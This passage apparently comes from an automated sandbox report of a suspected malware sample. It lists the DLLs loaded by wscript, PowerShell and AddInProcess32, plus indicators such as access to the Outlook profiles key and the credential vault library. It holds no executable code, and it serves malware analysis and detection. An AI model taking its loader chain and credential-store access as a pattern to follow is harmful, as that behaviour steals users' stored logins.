                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: C:\Windows\System32\wscript.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000B.00000002.1476246463.00007FFAAC5C0000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
